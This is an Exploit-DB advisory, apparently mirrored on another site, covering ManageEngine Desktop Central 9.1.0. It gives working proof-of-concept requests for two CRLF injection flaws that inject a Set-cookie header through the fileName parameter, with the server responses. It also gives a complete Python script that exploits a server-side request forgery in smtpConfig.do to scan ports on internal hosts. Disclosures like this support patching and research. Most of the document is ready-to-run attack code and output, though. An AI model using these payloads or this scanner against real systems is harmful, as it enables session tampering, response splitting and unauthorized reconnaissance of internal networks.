Desktop Central 9.1.0 – Multiple Vulnerabilities

  • 作者: Rafael Pedrero
    日期: 2023-03-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51082/
  • # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
    # Discovery by: Rafael Pedrero
    # Discovery Date: 2021-02-14
    # Software Link : http://www.desktopcentral.com
    # Tested Version: 9.1.0 (Build No: 91084)
    # Tested on:Windows 10
    
    # Vulnerability Type: CRLF injection (CRLF) - 1
    
    CVSS v3: 6.1
    CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    CWE: CWE-93
    
    Vulnerability description: CRLF injection vulnerability in ManageEngine
    Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
    headers and conduct HTTP response splitting attacks via the fileName
    parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
    
    Proof of concept:
    
    GET
    https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
    HTTP/1.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
    Firefox/85.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    DNT: 1
    Connection: keep-alive
    Referer:
    https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
    Upgrade-Insecure-Requests: 1
    Content-Length: 0
    Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
    STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
    showRefMsg=false; summarypage=false;
    DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
    JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
    JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
    Host: localhost
    
    Response:
    HTTP/1.1 200 OK
    Date:
    Server: Apache
    Pragma: public
    Cache-Control: max-age=0
    Expires: Wed, 31 Dec 1969 16:00:00 PST
    SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
    Secure
    Set-Cookie: buildNum=91084; Path=/
    Set-Cookie: showRefMsg=false; Path=/
    Set-Cookie: summarypage=false; Path=/
    Set-Cookie: dc_customerid=1; Path=/
    Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
    Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
    Set-Cookie: screenResolution=1280x1024; Path=/
    Content-Disposition: attachment; filename=any
    Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
    X-dc-header: yes
    Content-Length: 95
    Keep-Alive: timeout=5, max=20
    Connection: Keep-Alive
    Content-Type: text/csv;charset=UTF-8
    
    
    # Vulnerability Type: CRLF injection (CRLF) - 2
    
    CVSS v3: 6.1
    CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    CWE: CWE-93
    
    Vulnerability description: CRLF injection vulnerability in ManageEngine
    Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
    headers and conduct HTTP response splitting attacks via the fileName
    parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
    
    Proof of concept:
    
    GET
    https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
    HTTP/1.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
    Firefox/85.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    DNT: 1
    Connection: keep-alive
    Referer:
    https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
    Upgrade-Insecure-Requests: 1
    Content-Length: 0
    Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
    STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
    showRefMsg=false; summarypage=false;
    DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
    JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
    JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
    Host: localhost
    
    
    HTTP/1.1 200 OK
    Date:
    Server: Apache
    Pragma: public
    Cache-Control: max-age=0
    Expires: Wed, 31 Dec 1969 16:00:00 PST
    SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
    Secure
    Set-Cookie: buildNum=91084; Path=/
    Set-Cookie: showRefMsg=false; Path=/
    Set-Cookie: summarypage=false; Path=/
    Set-Cookie: dc_customerid=1; Path=/
    Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
    Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
    Set-Cookie: screenResolution=1280x1024; Path=/
    Content-Disposition: attachment; filename=any
    Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
    X-dc-header: yes
    Content-Length: 4470
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/pdf;charset=UTF-8
    
    
    
    # Vulnerability Type: Server-Side Request Forgery (SSRF)
    
    CVSS v3: 8.0
    CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
    CWE: CWE-918 Server-Side Request Forgery (SSRF)
    
    Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
    in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
    vulnerable server to trigger malicious requests to third-party servers or
    to internal resources. This vulnerability allows authenticated attacker
    with network access via HTTP and can then be leveraged to launch specific
    attacks such as a cross-site port attack, service enumeration, and various
    other attacks.
    
    Proof of concept:
    
    Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
    change the variable sitevuln value with ip address:
    
    import argparse
    from termcolor import colored
    import requests
    import urllib3
    import datetime
    urllib3.disable_warnings()
    
    print(colored('''
    ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
    ''',"red"))
    
    def smtpConfig_ssrf(target,port,d):
    now1 = datetime.datetime.now()
    text = ''
    sitevuln = 'localhost'
    url = 'https://
    '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
    40manageengine.com
    &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
    40manageengine.com'
    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
    buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
    JSESSIONID=D10A9C62D985A0966647099E14C622F8;
    DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
    try:
    response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
    (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
    'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
    https://192.168.56.250:8383/smtpConfig.do','Cookie':
    cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
    
    text = response.text
    now2 = datetime.datetime.now()
    rest = (now2 - now1)
    seconds = rest.total_seconds()
    
    if ('updateRefMsgCookie' in text):
    return colored('Cookie lost',"yellow")
    
    if d == "0":
    print ('Time response: ' + str(rest) + '\n' + text + '\n')
    
    if (seconds > 5.0):
    return colored('open',"green")
    else:
    return colored('closed',"red")
    
    except:
    now2 = datetime.datetime.now()
    rest = (now2 - now1)
    seconds = rest.total_seconds()
    if (seconds > 10.0):
    return colored('open',"green")
    else:
    return colored('closed',"red")
    
    return colored('unknown',"yellow")
    
    
    if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
    SSRF Open ports",required=True)
    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
    - SSRF Open ports",required=True)
    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
    9 - SSRF Open ports (0 print or 1 no print)",required=False)
    args = parser.parse_args()
    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
    
    
    
    And:
    
    $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
    
    ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
    
    192.168.56.250:8080 open
    
    $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
    
    ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
    
    192.168.56.250:7777 closed